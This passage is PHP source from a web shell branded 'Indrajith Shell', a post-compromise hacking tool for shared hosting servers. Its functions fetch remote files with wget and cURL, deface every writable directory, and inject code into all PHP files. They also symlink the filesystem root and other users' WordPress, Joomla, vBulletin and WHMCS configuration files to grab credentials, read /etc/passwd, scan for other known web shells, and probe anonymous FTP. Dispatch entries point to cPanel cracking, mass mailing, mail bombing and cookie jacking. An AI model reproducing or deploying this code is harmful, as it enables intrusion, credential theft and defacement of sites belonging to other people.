1488. $rt_ffile=$_GET['rurlfile'];
1489. $name=basename($rt_ffile);
1490. echo "<div id=result>";
1491. switch($opt)
1492. {
1493. case "WGET":
1494. if($os!='win')
1495. {
1496. cmd("wget $rt_ffile");
1497. alert("Downloaded Successfully...");
1498. }
1499. else
1500. {
1501. alert("Its Windows OS... WGET is not available");
1502. }
1503. break;
1504. case "cURL":
1505. if(function_exists('curl_init'))
1506. {
1507. $ch = curl_init($rt_ffile);
1508. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1509. $data = curl_exec($ch);
1510. curl_close($ch);
1511. file_put_contents($name, $data);
1512. alert("Download succeeded");
1513. }
1514. else
1515. {
1516. alert("cURL Not Available");
1517. }
1518. break;
1519. }
1520. echo "</div>";
1521. }
1522.  
1523. function hex_encode_ui()
1524. {
1525. if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx']))
1526. {
1527. $tyx=$_POST['tyxxx'];
1528. $rezultzz=$_POST['hexinp'];
1529. switch($tyx)
1530. {
1531. case "Encode":
1532. $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz);
1533. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
1534. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
1535. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
1536. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
1537. break;
1538. case "Decode":
1539. $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz);
1540. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
1541. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>$rzul</textarea>
1542. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
1543. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
1544. break;
1545. }
1546. }
1547. else
1548. {
1549. echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />
1550. <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>
1551. <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>
1552. Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
1553. }
1554. }
1555.  
1556. function killme()
1557. {
1558. global $self;
1559. echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
1560. $me=basename($self);
1561. unlink($me);
1562. }
1563.  
1564. function ftp_anonymous_ui()
1565. {
1566. echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1
1567. ftp.google.com
1568. ftp.r00t.com
1569. ftp.ajithkp.org
1570. ...
1571. ...</textarea></td></tr><tr><td><input class='input_big' type='submit' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
1572. }
1573.  
1574. function ftp_anonymous_bg()
1575. {
1576. echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
1577. $ftp_list=$_GET['ftp_anonz'];
1578. $xftpl = trim($ftp_list);
1579. $xftpl = explode("\n", $xftpl);
1580. foreach($xftpl as $xftp)
1581. {
1582. $xftp = str_replace("ftp://", "", $xftp);
1583. $conn_ftp = ftp_connect($xftp);
1584. $success = ftp_login($conn_ftp, "anonymous", "");
1585. if($success)
1586. {
1587. echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=green>Successfull</font></td></tr>";
1588. }
1589. else
1590. {
1591. echo "<tr><td><font color=7171C6>$xftp</font></td><td><font color=red>Failed</font></td></tr>";
1592. }
1593.  
1594. }
1595. echo "</table><br /><br /><hr /><br /><br />";
1596. }
1597.  
1598. function mass_deface_ui()
1599. {
1600. echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=".$_GET['path']."><tr><td>Name : <input size=40 name='mass_name'></td></tr>
1601. <tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
1602. }
1603.  
1604. function mass_deface_bg()
1605. {
1606. global $sep;
1607. $d_path=$_GET['mm_path'];
1608. chdir($d_path);
1609. $d_file=$_GET['mass_name'];
1610. $d_conten=$_GET['mass_cont'];
1611. if(is_dir($d_path))
1612. {
1613. chdir($d_path);
1614. $d_dirs=array();
1615. if($handle=opendir($d_path))
1616. {
1617. while(($item=readdir($handle))!==FALSE)
1618. {
1619. if($item=="."){continue;}
1620. if($item==".."){continue;}
1621. if(is_dir($item))
1622. {
1623. array_push($d_dirs, $item);
1624. }
1625. }
1626. }
1627. }
1628. echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
1629. foreach($d_dirs as $d_dir)
1630. {
1631. $xd_path=getcwd()."$sep$d_dir$sep$d_file";
1632. if(is_writable($d_dir))
1633. {
1634. $handle=fopen($xd_path, "wb");
1635. if($handle)
1636. {
1637. fwrite($handle, $d_conten);
1638. }
1639. }
1640. echo "<tr><td><font color=green>$xd_path</font></td></tr>";
1641. }
1642. echo "</table><br /><br /><hr /><br /><br /></div>";
1643. }
1644.  
1645.  
1646. function symlinkg($usernamexx,$domainxx)
1647. {
1648. symlink('/home/'.$usernamexx.'/public_html/vb/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin1.txt');
1649. symlink('/home/'.$usernamexx.'/public_html/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin2.txt');
1650. symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin3.txt');
1651. symlink('/home/'.$usernamexx.'/public_html/cc/includes/config.php','Indrajith/'.$domainxx.' =>vBulletin4.txt');
1652. symlink('/home/'.$usernamexx.'/public_html/inc/config.php','Indrajith/'.$domainxx.' =>mybb.txt');
1653. symlink('/home/'.$usernamexx.'/public_html/config.php','Indrajith/'.$domainxx.' =>Phpbb1.txt');
1654. symlink('/home/'.$usernamexx.'/public_html/forum/includes/config.php','Indrajith/'.$domainxx.' =>Phpbb2.txt');
1655. symlink('/home/'.$usernamexx.'/public_html/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress1.txt');
1656. symlink('/home/'.$usernamexx.'/public_html/blog/wp-config.php','Indrajith/'.$domainxx.' =>Wordpress2.txt');
1657. symlink('/home/'.$usernamexx.'/public_html/configuration.php','Indrajith/'.$domainxx.' =>Joomla1.txt');
1658. symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php','Indrajith/'.$domainxx.' =>Joomla2.txt');
1659. symlink('/home/'.$usernamexx.'/public_html/joomla/configuration.php','Indrajith/'.$domainxx.' =>Joomla3.txt');
1660. symlink('/home/'.$usernamexx.'/public_html/whm/configuration.php','Indrajith/'.$domainxx.' =>Whm1.txt');
1661. symlink('/home/'.$usernamexx.'/public_html/whmc/configuration.php','Indrajith/'.$domainxx.' =>Whm2.txt');
1662. symlink('/home/'.$usernamexx.'/public_html/support/configuration.php','Indrajith/'.$domainxx.' =>Whm3.txt');
1663. symlink('/home/'.$usernamexx.'/public_html/client/configuration.php','Indrajith/'.$domainxx.' =>Whm4.txt');
1664. symlink('/home/'.$usernamexx.'/public_html/billings/configuration.php','Indrajith/'.$domainxx.' =>Whm5.txt');
1665. symlink('/home/'.$usernamexx.'/public_html/billing/configuration.php','Indrajith/'.$domainxx.' =>Whm6.txt');
1666. symlink('/home/'.$usernamexx.'/public_html/clients/configuration.php','Indrajith/'.$domainxx.' =>Whm7.txt');
1667. symlink('/home/'.$usernamexx.'/public_html/whmcs/configuration.php','Indrajith/'.$domainxx.' =>Whm8.txt');
1668. symlink('/home/'.$usernamexx.'/public_html/order/configuration.php','Indrajith/'.$domainxx.' =>Whm9.txt');
1669. symlink('/home/'.$usernamexx.'/public_html/admin/conf.php','Indrajith/'.$domainxx.' =>5.txt');
1670. symlink('/home/'.$usernamexx.'/public_html/admin/config.php','Indrajith/'.$domainxx.' =>4.txt');
1671. symlink('/home/'.$usernamexx.'/public_html/conf_global.php','Indrajith/'.$domainxx.' =>invisio.txt');
1672. symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>7.txt');
1673. symlink('/home/'.$usernamexx.'/public_html/connect.php','Indrajith/'.$domainxx.' =>8.txt');
1674. symlink('/home/'.$usernamexx.'/public_html/mk_conf.php','Indrajith/'.$domainxx.' =>mk-portale1.txt');
1675. symlink('/home/'.$usernamexx.'/public_html/include/config.php','Indrajith/'.$domainxx.' =>12.txt');
1676. symlink('/home/'.$usernamexx.'/public_html/settings.php','Indrajith/'.$domainxx.' =>Smf.txt');
1677. symlink('/home/'.$usernamexx.'/public_html/includes/functions.php','Indrajith/'.$domainxx.' =>phpbb3.txt');
1678. symlink('/home/'.$usernamexx.'/public_html/include/db.php','Indrajith/'.$domainxx.' =>infinity.txt');
1679. }
1680.  
1681. function config_grabber_bg()
1682. {
1683. global $sym_htaccess,$sym_php_ini;
1684. mkdir('INDRAJITH', 0777);
1685. symlink("/", "INDRAJITH/root");
1686. $htaccess=fopen('INDRAJITH/.htaccess', 'wb');
1687. fwrite($htaccess,$sym_htaccess);
1688. $php_ini_x=fopen('INDRAJITH/php.ini', 'wb');
1689. fwrite($php_ini_x, $sym_php_ini);
1690. $usr=explode("\n",$_POST['user_z_list']);
1691. foreach($usr as $uzer)
1692. {
1693. $u_er=trim($uzer);
1694. symlinggg($u_er);
1695. }
1696. echo "<script>window.open('INDRAJITH/', '_blank');</script>";
1697. alert('Config Grab compted. Check configs in direcory INDRAJITH');
1698. }
1699.  
1700. if(isset($_POST['user_z_list']))
1701. {
1702. config_grabber_bg();
1703. }
1704.  
1705.  
1706. function config_grabber_ui()
1707. {
1708. if(file('/etc/passwd'))
1709. {
1710. ?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60 name=user_z_list><?php
1711. $users = file('/etc/passwd');
1712. foreach($users as $user)
1713. {
1714. $user = explode(':', $user);
1715. echo $user[0]."\n";
1716. }
1717. ?></textarea></td></tr><tr><td><input type='submit' class='input_big' value=' >> '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
1718. }
1719. else
1720. {
1721. alert(" File Not Found : /etc/passwd ");
1722. }
1723. }
1724.  
1725. function symlinggg($user)
1726. {
1727. symlink('/home/'.$usernamexx.'/public_html/blog/configuration.php', "INDRAJITH/".$user." =>blog/configuration.php");
1728. symlink('/home/'.$user.'/public_html/forum/includes/config.php', "INDRAJITH/".$user." =>forum/includes/config.php");
1729. symlink("/home/".$user."/public_html/wp-config.php", "INDRAJITH/".$user." =>wp-config.php");
1730. symlink("/home/".$user."/public_html/wordpress/wp-config.php", "INDRAJITH/".$user." =>wordpress/wp-config.php");
1731. symlink("/home/".$user."/public_html/configuration.php", "INDRAJITH/".$user." =>configuration.php");
1732. symlink("/home/".$user."/public_html/blog/wp-config.php", "INDRAJITH/".$user." =>blog/wp-config.php");
1733. symlink("/home/".$user."/public_html/joomla/configuration.php", "INDRAJITH/".$user." =>joomla/configuration.php");
1734. symlink("/home/".$user."/public_html/vb/includes/config.php", "INDRAJITH/".$user." =>vb/includes/config.php");
1735. symlink("/home/".$user."/public_html/includes/config.php", "INDRAJITH/".$user." =>includes/config.php");
1736. symlink("/home/".$user."/public_html/conf_global.php", "INDRAJITH/".$user." =>conf_global.php");
1737. symlink("/home/".$user."/public_html/inc/config.php", "INDRAJITH/".$user." =>inc/config.php");
1738. symlink("/home/".$user."/public_html/config.php", "INDRAJITH/".$user." =>config.php");
1739. symlink("/home/".$user."/public_html/Settings.php", "INDRAJITH/".$user." =>/Settings.php");
1740. symlink("/home/".$user."/public_html/sites/default/settings.php", "INDRAJITH/".$user." =>sites/default/settings.php");
1741. symlink("/home/".$user."/public_html/whm/configuration.php", "INDRAJITH/".$user." =>whm/configuration.php");
1742. symlink("/home/".$user."/public_html/whmcs/configuration.php", "INDRAJITH/".$user." =>whmcs/configuration.php");
1743. symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
1744. symlink("/home/".$user."/public_html/whmc/WHM/configuration.php", "INDRAJITH/".$user." =>whmc/WHM/configuration.php");
1745. symlink("/home/".$user."/public_html/whm/WHMCS/configuration.php", "INDRAJITH/".$user." =>whm/WHMCS/configuration.php");
1746. symlink("/home/".$user."/public_html/whm/whmcs/configuration.php", "INDRAJITH/".$user." =>whm/whmcs/configuration.php");
1747. symlink("/home/".$user."/public_html/support/configuration.php", "INDRAJITH/".$user." =>support/configuration.php");
1748. symlink("/home/".$user."/public_html/clients/configuration.php", "INDRAJITH/".$user." =>clients/configuration.php");
1749. symlink("/home/".$user."/public_html/client/configuration.php", "INDRAJITH/".$user." =>client/configuration.php");
1750. symlink("/home/".$user."/public_html/clientes/configuration.php", "INDRAJITH/".$user." =>clientes/configuration.php");
1751. symlink("/home/".$user."/public_html/cliente/configuration.php", "INDRAJITH/".$user." =>cliente/configuration.php");
1752. symlink("/home/".$user."/public_html/clientsupport/configuration.php", "INDRAJITH/".$user." =>clientsupport/configuration.php");
1753. symlink("/home/".$user."/public_html/billing/configuration.php", "INDRAJITH/".$user." =>billing/configuration.php");
1754. symlink("/home/".$user."/public_html/admin/config.php", "INDRAJITH/".$user." =>admin/config.php");
1755. }
1756.  
1757. function sym_xxx()
1758. {
1759. global $sym_htaccess,$sym_php_ini;
1760. mkdir('Indrajith', 0777);
1761. symlink("/", "Indrajith/root");
1762. $htaccess=@fopen('Indrajith/.htaccess', 'w');
1763. fwrite($htaccess,$sym_htaccess);
1764. $php_ini_x=fopen('Indrajith/php.ini', 'w');
1765. fwrite($php_ini_x, $sym_php_ini);
1766. $akps = implode(file("/etc/named.conf"));
1767. if(!$akps)
1768. {
1769. config_grabber_ui();
1770. }
1771. else
1772. {
1773. $usrd = array();
1774. foreach($akps as $akp)
1775. {
1776. if(eregi("zone", $akp))
1777. {
1778. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
1779. flush();
1780. if(strlen(trim($akpzz[1][0]))>2)
1781. {
1782. $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
1783. symlinkg($akpzz[1][0],$user['name']);
1784. flush();
1785. }
1786. }
1787. }
1788. }
1789. }
1790.  
1791. function sym_link()
1792. {
1793. global $sym_htaccess,$sym_php_ini;
1794. cmd('rm -rf AKP');
1795. mkdir('AKP', 0755);
1796. $usrd = array();
1797. $akps = implode(file("/etc/named.conf"));
1798. $htaccess=fopen('AKP/.htaccess', 'w');
1799. fwrite($htaccess,$sym_htaccess);
1800. $php_ini_x=fopen('AKP/php.ini', 'w');
1801. fwrite($php_ini_x, $sym_php_ini);
1802. symlink("/", "AKP/root");
1803. if(!$file)
1804. {
1805. echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
1806. echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
1807. $users = file('/etc/passwd');
1808. foreach($users as $user)
1809. {
1810. $user = explode(':', $user);
1811. echo "<tr><td>".$user[0]."</td><td><a href='AKP/root/home/".$user[0]."/public_html/' target=_blank>SymLink</tr>";
1812. }
1813. echo "</table><br /><br /><hr /><br /><br /></div>";
1814.  
1815. }
1816. else
1817. {
1818. echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
1819. foreach($akps as $akp)
1820. {
1821. if(eregi("zone", $akp))
1822. {
1823. preg_match_all('#zone "(.*)" #', $akp, $akpzz);
1824. flush();
1825. if(strlen(trim($akpzz[1][0]))>2)
1826. {
1827. $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
1828. echo "<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."</td><td><a href='AKP/root/home/".$user['name']."/public_html/' target=_blank>SymLink</a></td></tr></table>";
1829. flush();
1830. }
1831. }
1832. }
1833. }
1834. }
1835.  
1836. function shell_finder_ui()
1837. {
1838. echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value=' >> ' /></form><br /><br /><hr /><br /><br />";
1839. }
1840.  
1841. function shell_finder_bg()
1842. {
1843. $sh_url=$_GET['sh311_scanx'];
1844. echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
1845. $ShellZ=array("indrajith.php", "c99.php", "c100.php","r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php","cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
1846. foreach($ShellZ as $shell)
1847. {
1848. $urlzzx=$sh_url.$shell;
1849. if(function_exists('curl_init'))
1850. {
1851. echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>";
1852. $ch = curl_init($urlzzx);
1853. curl_setopt($ch, CURLOPT_NOBODY, true);
1854. curl_exec($ch);
1855. $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE);
1856. curl_close($ch);
1857. if($status_code==200)
1858. {
1859. echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
1860. }
1861. else
1862. {
1863. echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
1864. }
1865. }
1866. else
1867. {
1868. echo "<font color=red>cURL Not Found </font>";
1869. break;
1870. }
1871. }
1872. echo "</table><br /><br /><hr /><br /><br /></div>";
1873. }
1874.  
1875. function code_in_ui()
1876. {
1877. global $sep;
1878. $mode=$_POST['modexxx'];
1879. $ftype=$_POST['ffttype'];
1880. $c_cont=$_POST['code_cont'];
1881. $ppp=$_POST['path'];
1882. if(isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode!="" && $ftype!="" && $c_cont!="" && $ppp!="")
1883. {
1884. echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
1885. switch($mode)
1886. {
1887. case "Apender":
1888. $mmode="a";
1889. break;
1890. case "Rewrite":
1891. $mmode="w";
1892. break;
1893. }
1894. if($handle = opendir($ppp))
1895. {
1896. while(($c_file = readdir($handle)) !== False)
1897. {
1898. if((preg_match("/$ftype".'$'.'/', $c_file , $matches) != 0) && (preg_match('/'.$c_file.'$/', $self , $matches) != 1))
1899. {
1900. echo "<tr><td><font color=red>$ppp$sep$c_file</font></td></tr>";
1901. $fd = fopen($ppp.$sep.$c_file,$mmode);
1902. if($fd)
1903. {
1904. fwrite($fd,$c_cont);
1905. }
1906. else
1907. {
1908. alert("Error. Access Denied");
1909. }
1910. }
1911. }
1912. }
1913. echo "</table><br /><br /><hr /><br /><br /></div>";
1914. }
1915. else
1916. {
1917. ?>
1918. <div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php echo getcwd(); ?>"><tr><td>Mode : </td>
1919. <td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
1920. <tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value=' >> ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
1921. <?php
1922. }
1923. }
1924.  
1925. function ssh_man_ui()
1926. {
1927. ?>
1928. <div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
1929. <?php
1930. }
1931.  
1932. function ssh_man_bg()
1933. {
1934. $ssh_h=$_GET['ssh_host'];
1935. $ssh_u=$_GET['ssh_user'];
1936. $ssh_p=$_GET['ssh_pass'];
1937. if(!function_exists('ssh2_connect'))
1938. {
1939. alert("Sorry, Function ssh2_connect is not found");
1940. }
1941. $conn=ssh2_connect($ssh_h, 22);
1942. if(!$conn)
1943. {
1944. alert("SSH Host Not Found");
1945. }
1946. $log=ssh2_auth_password($conn, $ssh_u, $ssh_p);
1947. if(!$log)
1948. {
1949. alert("SSH Authorication failed");
1950. }
1951. $shell=ssh2_shell($conn, "bash");
1952. if($_GET['ssh_cmd']!="" && $_GET['ssh_cmd'])
1953. {
1954. $ssh_cmd=$_GET['ssh_cmd'];
1955. fwrite($shell, $ssh_cmd);
1956. sleep(1);
1957. while($line=fgets($shell))
1958. {
1959. flush();
1960. echo $line."\n";
1961. }
1962. ?>
1963. <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
1964. <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
1965. <?php
1966. }
1967. else
1968. {
1969. ?>
1970. <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
1971. <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
1972. <?php
1973. }
1974. }
1975.  
1976. function ftp_man_ui()
1977. {
1978. ?>
1979. <div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
1980. <tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
1981. <tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
1982. <tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
1983. <tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
1984. <tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
1985. <tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
1986. <?php
1987. }
1988.  
1989. function ftp_man_bg()
1990. {
1991. echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
1992. $fhost=$_GET['ftp_host'];
1993. $fuser=$_GET['ftp_user'];
1994. $fpass=$_GET['ftp_pass'];
1995. $fpath=$_GET['fpath'];
1996. $upl=$_GET['upload_file'];
1997. $down=$_GET['download_file'];
1998. if($fpath=="")
1999. {
2000. $fpath=ftp_pwd($conn);
2001. }
2002. $conn=ftp_connect($fhost);
2003. if(!$conn)
2004. {
2005. alert("FTP Host Not Found!!!");
2006. }
2007. $log=ftp_login($conn, $fuser, $fpass);
2008. if(!$log)
2009. {
2010. alert("FTP Authorication Failed");
2011. }
2012. if($upl!="")
2013. {
2014. $fp = fopen($upl, 'r');
2015. if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
2016. {
2017. echo "<center><font color=green>Successfully uploaded <font color=red> $upl </font> </font></center>";
2018. }
2019. else
2020. {
2021. echo "<center><font color=red>There was a problem while uploading <font color=green> $upl </font> </font></center>";
2022. }
2023. }
2024. if($down!="")
2025. {
2026. $handle = fopen($down, 'w');
2027. if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
2028. {
2029. echo "<center><font color=green>successfully written to <font color=red> $down </font> </font></center>";
2030. }
2031. else
2032. {
2033. echo "<center><font color=red>There was a problem while downloading <font color=green> $down </font> to <font color=green> $down </font> </font></center>";
2034. }
2035. }
2036. echo "<table class='table'><tr><th>Files</th>";
2037. ftp_chdir($fpath);
2038. $list=ftp_rawlist($conn, $fpath);
2039. foreach($list as $fff)
2040. {
2041. echo "<tr><td><pre>$fff</pre></td></tr>";
2042. }
2043. echo "</table></div>";
2044. }
2045.  
2046. //////////////////////////////// Frond End Calls ///////////////////////////////
2047.  
2048. if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
2049. {
2050. edit_file_bg();
2051. }
2052.  
2053. else if(isset($_REQUEST['sh311_scanner']))
2054. {
2055. shell_finder_ui();
2056. }
2057.  
2058. else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
2059. {
2060. ftp_man_bg();
2061. }
2062.  
2063. else if(isset($_REQUEST['ftpman']))
2064. {
2065. ftp_man_ui();
2066. }
2067.  
2068. else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
2069. {
2070. ssh_man_bg();
2071. }
2072.  
2073. else if(isset($_REQUEST['sshman']))
2074. {
2075. ssh_man_ui();
2076. }
2077.  
2078. else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
2079. {
2080. chdir($_GET['path']);
2081. code_in_ui();
2082. }
2083.  
2084. else if(isset($_GET['sh311_scanx']))
2085. {
2086. shell_finder_bg();
2087. }
2088.  
2089. else if(isset($_REQUEST['config_grab']))
2090. {
2091. sym_xxx();
2092. }
2093.  
2094. else if(isset($_REQUEST['ftp_man']))
2095. {
2096. ftp_man_ui();
2097. }
2098.  
2099. else if(isset($_REQUEST['mass_xploit']))
2100. {
2101. mass_deface_ui();
2102. }
2103.  
2104. else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
2105. {
2106. ftp_man_bg();
2107. }
2108.  
2109. else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
2110. {
2111. mass_deface_bg();
2112. }
2113.  
2114. else if(isset($_REQUEST['ftp_anon_scan']))
2115. {
2116. ftp_anonymous_ui();
2117. }
2118.  
2119. else if(isset($_GET['ftp_anonz']))
2120. {
2121. ftp_anonymous_bg();
2122. }
2123.  
2124. else if(isset($_REQUEST['killme']))
2125. {
2126. killme();
2127. }
2128.  
2129. else if(isset($_REQUEST['hexenc']))
2130. {
2131. hex_encode_ui();
2132. }
2133.  
2134. else if(isset($_REQUEST['remotefiledown']))
2135. {
2136. remote_download_ui();
2137. }
2138.  
2139. else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
2140. {
2141. remote_download_bg();
2142. }
2143.  
2144. else if(isset($_REQUEST['cpanel_crack']))
2145. {
2146. cpanel_crack();
2147. }
2148.  
2149. else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
2150. {
2151. remote_file_check_bg();
2152. }
2153.  
2154. else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
2155. {
2156. php_ende_bg();
2157. }
2158.  
2159. else if(isset($_REQUEST['remote_server_scan']))
2160. {
2161. remote_file_check_ui();
2162. }
2163.  
2164. else if(isset($_REQUEST['server_exploit_details']))
2165. {
2166. exploit_details();
2167. }
2168.  
2169. else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
2170. {
2171. massmailer_bg();
2172. }
2173.  
2174. else if(isset($_REQUEST['mysqlman']))
2175. {
2176. mysqlman();
2177. }
2178.  
2179. else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
2180. {
2181. mailbomb_bg();
2182. }
2183.  
2184. else if(isset($_REQUEST['cookiejack']))
2185. {
2186. cookie_jack();
2187. }
2188.  
2189. else if(isset($_REQUEST['massmailer']))
2190. {
2191. massmailer_ui();
2192. }
2193.  
2194. else if(isset($_REQUEST['rename']))
2195. {
2196. chdir($_GET['path']);
2197. rename_ui();
2198. }
2199.  
2200. else if(isset($_GET['old_name']) && isset($_GET['new_name']))
2201. {
2202. chdir($_GET['path']);
2203. rename_bg();
2204. }
2205.  
2206. else if(isset($_REQUEST['encodefile']))
2207. {
2208. php_ende_ui();
2209. }
2210.  
2211. else if(isset($_REQUEST['edit']))
2212. {
2213. edit_file();
2214. }
2215.  
2216. else if(isset($_REQUEST['down']) && isset($_REQUEST['path']))
2217. {
2218. download();
2219. }
2220.  
2221. else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path']))
2222. {
2223. download_gzip();
2224. }
2225.  
2226. else if(isset($_REQUEST['read']))
2227. {
2228. chdir($_GET['path']);
2229. code_viewer();
2230. }
2231.  
2232. else if(isset($_REQUEST['perm']))
2233. {
2234. chdir($_GET['path']);
2235. ch_perm_ui();
2236. }
2237.  
2238. else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
2239. {
